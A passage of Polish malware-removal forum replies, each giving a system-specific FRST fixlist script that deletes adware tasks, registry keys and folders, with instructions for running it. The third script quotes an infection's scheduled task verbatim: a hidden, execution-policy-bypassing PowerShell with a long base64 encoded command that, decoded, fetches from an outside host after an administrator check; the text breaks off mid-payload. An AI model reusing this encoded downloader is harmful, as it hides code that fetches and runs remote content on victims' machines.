[Napisy24Update] => "C:\Program Files (x86)\Napisy24\Napisy24Update.exe" "sleep" HKU\S-1-5-21-3892785472-537833713-3556955552-1003\...\MountPoints2: {4b80c827-4901-11e5-8296-ec0ec404acc8} - "G:\autorun.exe" CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [brak pliku] C:\Windows\system32dbgraw.bmp RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\Users\admin\AppData\Local\Akamai RemoveDirectory: C:\Users\Krzysztof\AppData\Local\MoronicallyCommodiousness DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\dobreprogramy Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v Napisy24Update /f CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wg ustawień forum, ponownie z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Problemem jest szkodliwe zadanie ConcussingSeasonerV2 w Harmonogramie. Działania do przeprowadzenia: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {20519E68-28A8-4A03-9CE2-2A38254549B3} - System32\Tasks\Chromium => C:\Users\UKASZ~1\AppData\Local\Chromium\APPLIC~1\450242~1.0\INSTAL~1\UNINST~1.EXE Task: {2113A336-37FF-4CC3-84B0-B3DF09415BB2} - System32\Tasks\Folding@HomeStatsUpload => C:\Folding@HomeCPU\FAHStatsUploader.exe [2009-06-08] () Task: {3C8AD0B7-AE90-49BB-95FA-360472757917} - System32\Tasks\{AB3DC6E0-374D-45D6-8FC2-74BEB7F4D1A3} => pcalua.exe -a C:\Users\Łukasz\AppData\Roaming\omiga-plus\UninstallManager.exe -c -ptid=adks Task: {C675EC1D-EC18-4DA4-9DCB-72210696C1EB} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2015-12-17] (AVAST Software) Task: {F8C053F2-2DA8-41E3-AB84-115F7D0FF40D} - System32\Tasks\ConcussingSeasonerV2 => Rundll32.exe SoullessnessPin.dll,main 7 1 Task: C:\Windows\Tasks\Chromium.job => C:\Users\UKASZ~1\AppData\Local\Chromium\APPLIC~1\450242~1.0\INSTAL~1\UNINST~1.EXE S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X] ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=MSE1 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=MSE1 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKU\S-1-5-21-2466319396-4157294396-1527453628-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=elm&hsimp=yhs-001&type=hdr_s_15_38_orgnl&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dpl%26pa%3DHodor%26cd%3D2XzuyEtN2Y1L1Qzu0E0C0FyE0B0BzytDyByB0EtByE0DtDyDtN0D0Tzu0StCtAyDtBtN1L2XzutAtFtCtAtFtAtFtCtN1L1Czu1M1Q1CtCyDtN1L1G1B1V1N2Y1L1Qzu2S0ByB0AtB0EyEzztAtGtC0AzzyCtGyEyB0CtBtGzyyBtCtBtG0D0B0D0E0C0C0CyEzyyD0F0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StBtBzy0F0F0FtBtDtGtAtBzyzztGyEtA0D0AtGzz0D0A0BtG0A0DyEtB0CyCyByEyDyBtD0C2QtN0A0LzuyEtN1B2Z1V1T1S1NzuzyzztB%26cr%3D627881398%26a%3Dhdr_s_15_38_orgnl%26os%3DWindows%2B8.1 SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://us.yhs4.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_dnldastr_15_26&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dpl%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0E0C0FyE0B0BzytDyByB0EtByE0DtDyDtN0D0Tzu0StCtByBtDtN1L2XzutAtFtCtDtFtCtDtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StCtDyCtB0FzztA0EtGtAyDtDyEtG0AyBtB0AtGyEtByCzytGtB0D0ByCtB0DyDzzyEtDzytA2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0C0FyB0BtDtBtDtBtGyB0AyDtDtGyEzy0AtDtGzy0E0AyEtGtCyDyDyEzyzztAyDtA0FyE0C2QtN0A0LzuyEtN1B2Z1V1T1S1NzuzztDtD%26cr%3D865094644%26a%3Dwncy_dnldastr_15_26%26os%3DWindows 8.1&p={searchTerms} SearchScopes: HKLM -> {6E82A80A-AE16-45B4-86AA-6C82E9516F5E} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=elm&hsimp=yhs-001&type=hdr_s_15_38_orgnl&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dpl%26pa%3DHodor%26cd%3D2XzuyEtN2Y1L1Qzu0E0C0FyE0B0BzytDyByB0EtByE0DtDyDtN0D0Tzu0StCtAyDtBtN1L2XzutAtFtCtAtFtAtFtCtN1L1Czu1M1Q1CtCyDtN1L1G1B1V1N2Y1L1Qzu2S0ByB0AtB0EyEzztAtGtC0AzzyCtGyEyB0CtBtGzyyBtCtBtG0D0B0D0E0C0C0CyEzyyD0F0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StBtBzy0F0F0FtBtDtGtAtBzyzztGyEtA0D0AtGzz0D0A0BtG0A0DyEtB0CyCyByEyDyBtD0C2QtN0A0LzuyEtN1B2Z1V1T1S1NzuzyzztB%26cr%3D627881398%26a%3Dhdr_s_15_38_orgnl%26os%3DWindows%2B8.1&p={searchTerms} SearchScopes: HKLM -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL = hxxp://us.yhs4.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_ir_15_24&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dpl%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1Qzu0E0C0FyE0B0BzytDyByB0EtByE0DtDyDtN0D0Tzu0StCtByCtDtN1L2XzutAtFtCtDtFtCtDtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyByB0C0BzztDzyyCtGyCzyyDyDtGtCtCzztBtGtDyD0DyDtGtC0AtC0EyEtAzyyDtA0Czyzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0AtC0CyDtC0EzytAtGzz0EzztAtGyEtAtD0DtG0AyEyEyDtG0AtDyD0FyD0BtByEyEtA0AtC2QtN0A0LzuyE%26cr%3D1539620490%26a%3Dwny_ir_15_24%26os%3DWindows 8.1&p={searchTerms} SearchScopes: HKU\S-1-5-21-2466319396-4157294396-1527453628-1001 -> DefaultScope {6E82A80A-AE16-45B4-86AA-6C82E9516F5E} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=elm&hsimp=yhs-001&type=hdr_s_15_38_orgnl&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dpl%26pa%3DHodor%26cd%3D2XzuyEtN2Y1L1Qzu0E0C0FyE0B0BzytDyByB0EtByE0DtDyDtN0D0Tzu0StCtAyDtBtN1L2XzutAtFtCtAtFtAtFtCtN1L1Czu1M1Q1CtCyDtN1L1G1B1V1N2Y1L1Qzu2S0ByB0AtB0EyEzztAtGtC0AzzyCtGyEyB0CtBtGzyyBtCtBtG0D0B0D0E0C0C0CyEzyyD0F0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StBtBzy0F0F0FtBtDtGtAtBzyzztGyEtA0D0AtGzz0D0A0BtG0A0DyEtB0CyCyByEyDyBtD0C2QtN0A0LzuyEtN1B2Z1V1T1S1NzuzyzztB%26cr%3D627881398%26a%3Dhdr_s_15_38_orgnl%26os%3DWindows%2B8.1&p={searchTerms} SearchScopes: HKU\S-1-5-21-2466319396-4157294396-1527453628-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKU\S-1-5-21-2466319396-4157294396-1527453628-1001 -> {6E82A80A-AE16-45B4-86AA-6C82E9516F5E} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=elm&hsimp=yhs-001&type=hdr_s_15_38_orgnl&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dpl%26pa%3DHodor%26cd%3D2XzuyEtN2Y1L1Qzu0E0C0FyE0B0BzytDyByB0EtByE0DtDyDtN0D0Tzu0StCtAyDtBtN1L2XzutAtFtCtAtFtAtFtCtN1L1Czu1M1Q1CtCyDtN1L1G1B1V1N2Y1L1Qzu2S0ByB0AtB0EyEzztAtGtC0AzzyCtGyEyB0CtBtGzyyBtCtBtG0D0B0D0E0C0C0CyEzyyD0F0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StBtBzy0F0F0FtBtDtGtAtBzyzztGyEtA0D0AtGzz0D0A0BtG0A0DyEtB0CyCyByEyDyBtD0C2QtN0A0LzuyEtN1B2Z1V1T1S1NzuzyzztB%26cr%3D627881398%26a%3Dhdr_s_15_38_orgnl%26os%3DWindows%2B8.1&p={searchTerms} StartMenuInternet: IEXPLORE.EXE - iexplore.exe CHR HKLM\...\Chrome\Extension: [ajcmdlkeklfmbjffnlofgfkjcnpfckab] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-2466319396-4157294396-1527453628-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ajcmdlkeklfmbjffnlofgfkjcnpfckab] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ajcmdlkeklfmbjffnlofgfkjcnpfckab] - hxxps://clients2.google.com/service/update2/crx C:\ProgramData\*.log C:\Users\Łukasz\AppData\Local\*.tmp C:\Users\Łukasz\AppData\Roaming\*.* C:\Users\Łukasz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\3c2f5dbd57bb3f49\Chromium.lnk C:\Users\Łukasz\AppData\Roaming\Microsoft\Windows\SendTo\МойМир@Mail.ru.lnk C:\Users\Łukasz\Desktop\DUNE2000 — skrót.lnk C:\Users\Łukasz\Desktop\LOD.lnk C:\Users\Łukasz\Downloads\aspsetup.exe C:\Users\Łukasz\Downloads\sh-remover.exe RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\Folding@HomeCPU RemoveDirectory: C:\Program Files\Common Files\AV\avast! Antivirus RemoveDirectory: C:\ProgramData\AVAST Software RemoveDirectory: C:\ProgramData\Temp RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\2K Games RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Digital Image Recovery RemoveDirectory: C:\Users\Łukasz\AppData\Local\{F9D1CF8D-DD79-A335-B0E1-86DD94897A45} RemoveDirectory: C:\Users\Łukasz\AppData\Local\ConcussingSeasoner RemoveDirectory: C:\Users\Łukasz\AppData\Local\Opera Software RemoveDirectory: C:\Users\Łukasz\AppData\Local\Systweak RemoveDirectory: C:\Users\Łukasz\AppData\Roaming\Opera Software RemoveDirectory: C:\Users\Łukasz\AppData\Roaming\Systweak RemoveDirectory: C:\Users\Łukasz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Macgo Windows Blu-ray Player RemoveDirectory: C:\Users\Łukasz\Desktop\Stare dane programu Firefox RemoveDirectory: C:\Windows\System32\Tasks\AVAST Software DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AVAST Software DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z menu Notatnika > Plik > Zapisz jako > wprowadź nazwę fixlist.txt > Kodowanie zmień na UTF-8 Plik fixlist.txt umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Ów chiński obiekt w starcie to Tencent, ale to nie jest jedyny problem w systemie, dużo innych obiektów adware. Działania do przeprowadzenia: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R2 Airtostrong; C:\ProgramData\\Airtostrong\\Airtostrong.exe [540160 2016-01-22] () [brak podpisu cyfrowego] R2 aotech; C:\Program Files\aotech\aotech.exe [383488 2016-01-22] () [brak podpisu cyfrowego] HKLM-x32\...\Run: [pcmgr] => C:\Program Files (x86)\ppt\Uninst.exe [1571296 2015-12-28] (Tencent) AppInit_DLLs: C:\ProgramData\Airtostrong\Lacof.dll => C:\ProgramData\Airtostrong\Lacof.dll [805376 2016-01-22] () AppInit_DLLs-x32: C:\ProgramData\Airtostrong\Physsoft.dll => C:\ProgramData\Airtostrong\Physsoft.dll [257536 2016-01-22] () Task: {007A3879-EAB9-4943-B2FB-7E8706926C49} - System32\Tasks\{0E0D7A47-0C0A-7E0E-0D11-0D7A790B117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAbwByAGEAbABsAHMAaABvAHAALgBpAG4AZgBvAC8AdQAvAD8AYQA9AHIAbwBsAGIAbAA5AEwAdgBUAEUAZgBFAE4AZQBKAGEAeQA2AEwAYQBqAGcAMQBaADkAQQBhAG8ALQBLAHQAagBGAF8ATwBPAEQAYgBSADcAUABOAEEAZwBmAHMATQBwAEEARwBJAGEANwBZAGIASABMAFkAeQBWADQATQBVAEQAYgA0ADkAUgBPAC0AMgBqAEkARwAxAEEAbABhAGYAdwBZAHIAdgBGAEwARgBlAGIAOAB2AEcATwBRAFQATgB6AGYAeQBlAFkAVQByAGYAawBuAHUAaQBXAEEAawBIAGEAXwAyADEASABnAE4ASQBJAFQASgBIADcASABsAHcAYgBkAE0AcABsADMAbwA1AEMANQBVAGgATABrADkARQBkAHIANABZAFYAegBNAEwAQQAtAEgAZQBxAG8AawA3AE4AQgBLAEUAQwBtAHQANABwAGIARgBSAG4AYgBQAGsAWAAyAFQAWABaAG0ASwBDAGsAYgBuAEEAdABBAFUAQgBkAFUAWAB5AEQAYgA4ADEAWgBtAGUATQA2AFUAQQAyAFkAZwBIAFgATABqAHgASgAxADgANgBsADkARwBVAGoAUQBvAGYATwBpAHIAbwAtAG4ANABIAGgAQgBkAGgARgByAHIAZQBzAGsAQgBqAEgAWABPADkAaQBNAEEAZABUAGsAMwBaAHUAYgBIAEYAcgBaADUAMQBYAGUASwBMADQAaAA1AFAAZABoAEQARwBRAGcASgBQAFUAVABzAHAATQBBAGEAdQBiAG0ATwBOAFoAZgBSAHoAdgBNAGcAOQBfAGMAZgBCADYARwBOAFEAUwBTAGgAOABzAFMANABSAGkAZgByAHkAOABFAHEAbgBIAGsASwAwADEASwBJAGcARgBFAFMANwBiAGIAZQBiAEgANwBGAEYAZAAwAEIAMQA5AGkAbgBOAGgAaAAyAEgAXwBKAEgAbABNAFIAOQA4AFAAcwBTAFUAWgBRAHkAcgBRAFMAZQBwAE0AOQBtAFkAaQBPAG0AVAB5AFYAagBIAFMAVwB1ADIAegBVAEEAQQB0AGQARgBpAHMAawBPADUATQBnADUASgB3AHQAUgA2AF8AZABYAGgALQA3AGUASQBZAFYAWABTAEUATABkAHcARABPAFcAdABHAEUASABJAHAAYwBiADMAagBCAFcARQA0ADEAZQBZAGgAXwB0AEYAdwA2AEQAdwBUADgAVwBZAHAAUQBkADMAZwB6AFIASABKADYAYQB2AGcAMgBSAHkATQBXAEEATQBoADEANgBtAGQAaABOAGYASwB0AFMAZQBaAGUAUQBYADQAUQByADYAZgBTAFQAbQB3AHEAOABGAE0ATABHADYAWABBAEEASgAtADkAMgBsAHEAbwA0AEYAZABtAHAAZQBvAE4AYQBYADIATABfAFMAZABSAEsAegBTAHgAZwBKADkAMgA3ADQAWgAwAFEALQBkAGQAMABXAFgAcgBJAHgATAAxAGwAdwA0AE4ASAB6ADcAegBMADIAaAA2AEIAegBxAGcARQBBADUAeQAwAFEAOQBHAE4ARgBxAE4AQwBKAEgANABtAGMAZABrAFAAYgBDAGIAYQB0AHgASQBTAGIAVQBmAGQAaQBMAHEAYQBkAGgAYwB2AFgAOQBpADIANgBaAG4AcAA4AGUAZgAxAEgAbQAzAG8ARQBCAC0ASQBIAEUASQB3ADYAVQAzAEEARQBCAGsAOABvAFkAWQBMADUALQBvAGMAVwB2ADEAaQB0ADIAbABhAFQANABkAHMAVwBtAFkAUwBTAEkAOQA2AEIAWgBGAE8AcABqAHMAcQBaAFUAcQA3AEgAUQBLAE0AZwBYAEsAbQBEAFcAZwBYAHIAUwBtAFYASQA3AEMAWgBkADUAZQBWAFQAeABJADkAZQB6AHYAWQBNAHcAZgAxAEYASQA5AHoAWgAzAEYAaAA5ADQAYQBnAHYAMwBwAGIAZgBuADEATQBKAGEAYgB6AGUAWgB2AEIANgAyAHUAVgB0ADgAZQBFADIAUABPAHoAZABvAFEAZABPAHQASgBuAC0AQgBlAFEATQAyAGcAQgAtAGUATgBTAHQAQQBOAFYAaAB6AE8ASQB4ADIARwByAGIAYgBuAHMAbABTAE4AdQB4AF8AUABXAHMASgBWAGkAYwBIADgARwB4AHEAMQBHAHMAVwBBAEoAdgBUAEUAWAB3AG8AVQBTAE8AdgBaAHEAQwBpAFUAWABVADAARABaAFEAcgBDADQARQA3AEwAMgBTAGUAeQBPAGsAdwBCAEsAcgBKADgATQA4AHEAYQBRAGgATABrAE8ANgBEAFkAMQAyAGcAbwBrAG8ANQBuAEYAMABhAFYAcgAyAFMAdwBqAFEAJgBjAD0AQgBqAGEARQBIADUASQA1AHEAVAA4AE8AWQBfAFMAawBuADMARABUAE8ARABWADgATwBXADcAMgA3AHMASgBkAHIAYgB1AHUAQwBWAGkAZwB1AC0AeQBuAEIAXwBUAHkARgBMAGMARQB2AEEAaQAtAE8AagB0AEIANgBZAHkAYwB4AHoAbwBSAFEAQQBaAEsARgBZADcAQgBIAGwAcgBaAFMAdABfAFAAdgA4AFoAMABWAFoAdABOAEsAcAA1AGQATQBQADYASwA5AHYAOAByAGgAZwBGAEEATABiAHUANwBtADUAbABLAHcAcABEAEoAbQBFAFEAVgBKAGcAZABzAHEASQAxADkAagBQAHAAbwB0AFkAaABhAHYAOQAwAEkAdwBQAEMAYgBXAGQAZABxAE0AYwB2AGkAYgBSAE8AbgBrAEgANwBaAGkAbwBEAHEASQBSAGMAVgBZAG8AWgBRAEkAZwBaAEIAcABIAGoAUQBPAE8ANABaAFEAbQA2ADAAWgAwAHkATABnAEEALQBHAG0AWQBZAEoAZgB6AEwAawBrAEoAaQBpADcAZwB0AGUAUAB6AHIARwBaADgAbwBoAHoAawBJAFYAaQBxAHoAUgBQAGEATwBIADcAcwBQAHcAMwBhAGwAXwB2AEEATgB0AEkAQgA5AG0ASgBnAHQAcAAxAHoAWQAtAFgASgBTAE0AbwBIAEcATwBLAEEAbQB0AFMAaABkAGQAawBMAHcAbwBaAEQAaABOAHgAUgAxAGEANwAxAEUAcwBvADMAOABJAFMASwBKAGIAMgBxAGcAVAB1AEQATgBoAFoAawBBAHUAaQBOAEUAeQBsADUAYwBfAFAAawBmADQAUQBNADEASQA5AEsATAB1AHcARQBtAGEAbgBJADcAYQBSAE8AMgByAGwAagBsAFYAdQAwADEAQgB2ADIAcgBQAHcAWgBKAEYARwBVAGoANgA0AEkARABNADYAMwB5AC0AXwB0AEIAdwB5ADUALQBKAHgAYgBDAEQAVABxAGQAVQBIAC0ARwBuADYAbgBOAE8AbQBoAEIASgB4AE4AaQByAEcARwBEADgANABBAEsANwAzADEAVABMAEcANQBuAHIAagBLAG0AUABFADIAdQAwAHQAMABHAGwAMQBnAFkAMQBOADgAXwBNADUAQwBhAFQATwBoAGUAOAAtAGwAYgB4AHMAVAB6AFoAbwBNAFkAdgAyADIAMwBVAGsAdwAyAFcAZQB2AG4AUQAxAHUAMgAwAEMAcgBoAGsAdAB1AHgAXwBvAHQAMgBiAHEANABVAG0AMgBQAFEAaQBxAHkAeQBtAHAAVgBsAHUAWgBKADMAZgBBADYAbQBwAEwAeABUADkAeQBjAGQASABhAFUAWgBfAG4ANABjAHAAZABIAHEASABfAEMAZgBfADMAawBoAGsAQQB6AHYAbgBfAGIAVABoADQASQBvAEMAaAA5AEYAMgBDAFoARwBxAFUAUgBWAG8ATQBrAFUAWQBRAE8ATwBiAEMARgBBAF8ARABaADQAaAA1AFcANgBhAGMAcABWAHAAcwBvAEkAVgB1AG8AVABIADgAZABMAEQAZQBoAGcAcQAzAE4AUwBlAEgAZgBEADQAVAAxAG0AeQBNADkARwBIAFMAOAB4AC0AeABqAFUAVwBEADQAMwBEAGQAeABUAEIAXwBaAGYARQBiAHcASQBXAGUAWgBXAFQANgBvAGUAcgBfAHcAWgBQAEQANwBDADEAYQB2AFkAegBkAHIAeABOAC0AVwBYAHQASgBCAEQAMgB0AFoAUgBmAHUAWgB6ADcAYgA0AE0AbAB2AGIAMQBmAFMAcwBuAGkAcAAtAG8ANwByAEkAbQA2AFAAZgBzAFcAVgBTAHQAeAAyAEsAYwAzAEMASwBuAGEAbwAxAG4ARQBxAGYAaABHADUAYQBqADMARQB5AE8AUABtAFIAOAA3AGsAUABrAHcAcwAtAFYAbgBQAFYAYQBZAFMAUABtAEEANgBJAHEAVgBUAFUAMwBHAEQAagAyADAAeAAyAGkAdABqAHoAegAxAGUAcQBMAGMAeQA0ADMAUwBmAG0AaQB1AGMAQQBNAEYASwAyADEAZgBrAHAAWgBlAEoAdgBQAFcAbwB2AGMAYwBlAFAAVABFAE8ARABQAHcAVAA1AFYAWQBlAHEAcgA1AGoAcwBkAGwAaABEAGYAcgAtAF8AaQBjAFkAVgA3AEIARgBLAGoATABnAFAATQBtAGkASAAyAEYAUgA0ADUATABSAHcALQBMAFMAaABzADgAVAB5AHkAUwBIAE0AQQBJAG4AagB1AGgATwBQADQAUABOAFEAagBDADMAUQBFAEEAVABFAGYATgByAHAAdwBmADQAcwA0AHkARAA0AEMARwBEAEMAbwBfAGUAYgBwAGUATwAtAEcAaAA5ADMAJgByAD0AMQAyADkAMwAyADEAMAA3ADMANAA1ADEAMAAxADIANwA1ADYAMAAiADsAJABzAHQAcwBrAD0AIgB7ADAARQAwAEQANwBBADQANwAtADAAQwAwAEEALQA3AEUAMABFAC0AMABEADEAMQAtADAARAA3AEEANwA5ADAAQgAxADEANwBBAH0AIgA7ACQAcAByAGkAZAA9ACIAUwB5AHMAdABlAG0ASABlAGEAbABlAHIAIgA7ACQAaQBuAGkAZAA9ACIASABHAE8AQwBLAEYASABCACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAd